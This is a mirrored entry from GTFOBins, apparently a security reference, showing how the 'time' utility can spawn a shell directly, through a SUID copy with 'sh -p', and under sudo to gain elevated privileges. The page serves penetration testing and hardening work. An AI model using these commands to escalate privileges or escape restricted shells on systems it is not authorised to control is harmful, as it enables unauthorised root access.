1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-11-08 07:49:17 +01:00
GTFOBins.github.io/_gtfobins/time.md
2018-07-04 19:26:52 +01:00

338 B

description functions
Note that the shell might have its own builtin time implementation, which may behave differently than` /usr/bin/time`, hence the absolute path.
execute-interactive suid-enabled sudo-enabled
code
/usr/bin/time /bin/sh
code
./time /bin/sh -p
code
sudo /usr/bin/time /bin/sh